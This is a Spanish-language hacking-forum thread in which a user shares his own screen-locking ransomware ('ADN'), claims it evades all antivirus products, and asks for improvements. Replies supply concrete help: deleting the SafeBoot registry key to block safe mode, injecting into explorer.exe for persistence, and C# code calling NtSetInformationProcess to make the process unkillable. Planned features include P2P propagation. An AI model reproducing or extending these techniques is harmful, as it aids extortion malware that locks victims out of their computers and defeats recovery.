Mostrar mensajes previos
Ordenar por
por SadFud Usa camisa de fuerza
Saludos indetectables

Hara como una semana que un amigo me contacto porque se habia infectado de una variantes del conocido en españa como "virus de la policia" y me pidio ayuda para eliminarlo. Para quien no sepa lo que es un ramsomware es simplemento una aplicacion que bloquea el acceso al pc y pide un rescate monetario, hay dos tipos, los que encriptan archivos y los que simplemente muestran una imagen en pantalla.
Bien pues tras esa experiencia pense que tan dificil seria desarrollar uno de estos programas por eso me decidi a hacer mi propia variante, la he llamado ADN ramsomware.
He estado autoinfectandome virtuales para ver el funcionamiento de unas cuantas variantes y asi tratar de crear una mas poderosa.

Imagen


Scan

Mostrar/Ocultar

En esta primera version las funciones son simples
+ No necesita permisos de administrador para funcionar al 100% ( en algunas variantes hacia falta)
+ Es imposible cerrarlo una vez abierto (algunas variantes se cerraban con alt+f4)
+ Es indetectable al 100% de las compañias de antivirus

Funciones que quiero añadir:
+ Inicio con windows
+ Propagacion por p2p
+ Bloquear arranque en modo seguro ( es la forma mas utilizado para remover este tipo de malware)

Si alguien tiene ideas de que mas funciones se podrian añadir o formas de evadirlo que lo comente y asi lo voy mejorando.

DISCLAIMER: Ni que decir tiene que esto es solo con fines educativos y que no me responsabilizo del uso del ejecutable.

Link: [Enlace externo eliminado para invitados]

rar siggggggggggy
666699966999999996699966699999
666699966999999996699966969999
699999966999999996699966996999
666699966999999996699966999699
666699966999999996699966999699
699999996699999966999966996999
699999999669999669999966969999
699999999996666999999966699999
https://reversecodes.wordpress.com

http://indeseables.github.io/
por Kaway Baneado ;(
OK , Se ve muy bueno brother,voy a usar. gracias por comparti com el foro
We live in hell it will always have pain. - Uchiha Obito.

@ Indetectables [ Modder - Coder ]
por Jscript32 Delirios esporádicos
Al abrir el Zip, me muestra que el archivo tiene un formato desconocido o esta dañado, el antivirus no ha saltado que ha pasado?
No rendirse es el objetivo, tu decides....Si quedarte en el suelo y ver como tus sueños se desvanecen o levantarte y volver a empezar Indetectables Team.
por MaggicianCOr Se conecta desde un manicomio
Jscript32 escribió:Al abrir el Zip, me muestra que el archivo tiene un formato desconocido o esta dañado, el antivirus no ha saltado que ha pasado?
Fijate justo al final del tema:

rar siggggggggggy

P.D = Sadfud creo que es bastante importante que le añadas la opción de arranque con windows, puesto si no no deja de ser un "virus broma" apagas el pc lo enciendes y listo

Un salút
El tiempo no es obstáculo
por __ws Esquizofrénico
Ojalá hubieran mas cosas como estas en el foro

Hace tiempo hice uno similar... de lo mas cutre.

Mostrar/Ocultar

PD: En lugar de bloquear el inicio en modo seguro, podrías hacer que el exe también inicie en modo seguro

PD2: Añadele persistencia y anti taskmgr. (ya que con un simple ctrl+alt+surp, cierras el proceso del super virus.)

Saludos!
por SadFud Usa camisa de fuerza
Ninfrock escribió:Ojalá hubieran mas cosas como estas en el foro

Hace tiempo hice uno similar... de lo mas cutre.

Mostrar/Ocultar

PD: En lugar de bloquear el inicio en modo seguro, podrías hacer que el exe también inicie en modo seguro

PD2: Añadele persistencia y anti taskmgr. (ya que con un simple ctrl+alt+surp, cierras el proceso del super virus.)

Saludos!
Buena idea lo de hacer que se inicie en el modo seguro, no se me habia ocurrido y sera mas facil que bloquear el modo seguro, gracias.

El anti tasmgr esta hecho, ni alt+tab ni cntrl+tab ni alt f4 ni cttrl+alt+supr ningun atajo de teclado funciona, no se puede finalizar el proceso
666699966999999996699966699999
666699966999999996699966969999
699999966999999996699966996999
666699966999999996699966999699
666699966999999996699966999699
699999996699999966999966996999
699999999669999669999966969999
699999999996666999999966699999
https://reversecodes.wordpress.com

http://indeseables.github.io/
por __ws Esquizofrénico
Para bloquear modo seguro borra la clave del registro "HKLM\SYSTEM\ControlSet001\Control\SafeBoot"

Para iniciarte en modo seguro, lo mas simple es infectar a explorer.exe.

Lo del anti task, bloqueas las combinaciones de teclas con hooks?

Como haces lo del Un Killable process?
por SadFud Usa camisa de fuerza
Version 0.2
Scan:

Mostrar/Ocultar

Cambios:
+ Muestra nombre del PC y usuario activo
+ Autoinicio añadido (ya no vale tirar del cable como dijo el compañero MaggicianCOr ) probado en win 7 y XP

Link: [Enlace externo eliminado para invitados]

rar siggggggggggy


Cualquier reporte de bugs o idea para añadir es bienvenida

PD: Para Ninfrock. Lo primero gracias por decirme como deshabilitar el modo seguro, es mas que probable que sea implementado en la prox version y por el consejo sobre la inyeccion a otro proceso. Respecto a como hacer el unkillable process, se consigue con las propias caracteristicas del formulario y un timer, eso resuelve las combinaciones estilo alt+tab, para el admin de tareas simplemente comprueba si el proceso esta activo y si lo esta lo cierra, eso con otro timer.

Saludos
666699966999999996699966699999
666699966999999996699966969999
699999966999999996699966996999
666699966999999996699966999699
666699966999999996699966999699
699999996699999966999966996999
699999999669999669999966969999
699999999996666999999966699999
https://reversecodes.wordpress.com

http://indeseables.github.io/
por __ws Esquizofrénico
Dudo de puedas anular la tecla windows, ni ctrl+alt+supr con un simple form...

Ademas no es unkillable process, ya que con un simple Killprocess lo cierras... simplemente dificultas que abra el taskmgr

No digo que esté mal, pero unkillable process es otra cosa

En que lenguaje está compilado?

PD: No tengo idea que es rar siggggggggggy

PD2: Con la inyeccion en otro proceso, te van a saltar muchos avs, con persistencia me refería a que si cierras el proceso se vuelva a ejecutar, al eliminar el archivo se vuelva a crear, etc.

Saludos!
por SadFud Usa camisa de fuerza
Voy por partes xD

"Dudo de puedas anular la tecla windows, ni ctrl+alt+supr con un simple form..." Ejecutalo y se te quitaran las dudas. No es que bloquee cntrl alt supr, es que bloqueo el taskmgr, las otras opciones son inutiles, cerrar sesion, bloquear, cambiar contraseña o cambiar de usuario, si tienes, si no tienes no vas a poder crearlo. usa La 0.1 mejor que no tiene autoinicio y asi al reiniciar no se abre

No dificulto que lo habras, lo imposibilito, no puedes intentar nada porque lo unico que tu pantalla mostrara sera el form.

.NET

un tipo de encriptacion para archivos, subo la tool: [Enlace externo eliminado para invitados]

No es necesario, no puedes cerrar el proceso ni acceder al disco C:\ (el que tenga el SO instalado, variara en cada caso)

Saludos
666699966999999996699966699999
666699966999999996699966969999
699999966999999996699966996999
666699966999999996699966999699
666699966999999996699966999699
699999996699999966999966996999
699999999669999669999966969999
699999999996666999999966699999
https://reversecodes.wordpress.com

http://indeseables.github.io/
por Blau Moderador
Si está en C# quizá esto te sirva (no lo he probado): 
using System;
using System.Collections;
using System.Collections.Generic;
using System.Data;
using System.Diagnostics;
using System.Runtime.InteropServices;
public class clsProcessProtect
{

	[DllImport("ntdll")]
	private static extern int NtSetInformationProcess(IntPtr hProcess, int processInformationClass, ref int processInformation, int processInformationLength);

	EventHandler psStop = new EventHandler(StopProcessProtection);
	const  iStop = 0;
	const  iStart = 1;
	const  ProcessPriorityClass = 29;
	public clsProcessProtect()
	{
	}

	public clsProcessProtect()
	{
	}

	public void Start()
	{
		StartProcessProtection(ref iStart);
		AppDomain.CurrentDomain.ProcessExit += psStop;
		AppDomain.CurrentDomain.DomainUnload += psStop;
		Application.ApplicationExit += psStop;
	}

	private bool StartProcessProtection(ref int psInfo)
	{
		try {
			NtSetInformationProcess(Process.GetCurrentProcess().Handle, ProcessPriorityClass, ref psInfo, Marshal.SizeOf(psInfo));
			return true;
		} catch (Exception ex) {
			MessageBox.Show(ex.Message + Constants.vbNewLine + ex.InnerException.ToString());
		}

	}

	private bool StopProcessProtection()
	{
		try {
			StartProcessProtection(ref iStop);
		} catch (Exception ex) {
			MessageBox.Show(ex.Message + "\n" + ex.InnerException.ToString());
		}
	}

}
por __ws Esquizofrénico
Ninfrock escribió:Ok, entendido

Pero no lo puedo ejecutar, aun me estoy enterando que es siggggggggggy...
por asd1234 Sin sí­ntomas
Buenisimo Tu Proyecto lo acabo de testear , faltaria que se auto inicie y evitar inicio modo a prueba de fallos ( claro aclarando que lo activaste ) y poder editar el texto con desbloqueo con clave !!!! espero que sigas mejorando :D ! salu2
por TheCruZ Delirios esporádicos
E de decir que lo e probado en una virtual y no me a ido que digamos.... se abria una ventana pero se puede cerrar con click derecho cerrar, y poco mas

edit:e mirado el code y hay 101 errores por segundo, y porque haces asi el inicio de windows xD

bueno gracias igualmente
-=TheCruZ=-

Algunos aportes:
Multiples aportes de crypters V
Bypass Eset en el scan de memoria(No a las funciones) V
Crypter polimorfico V
Quitar errores de dll con ollydbg V
Multi S.O Checker V
Archive Ejecutor V
Generador de strings V
Scanner de puertos V
Temas Recientes
Links sobre el tema
Variantes de tema
Responder

Volver a “Troyanos y Herramientas”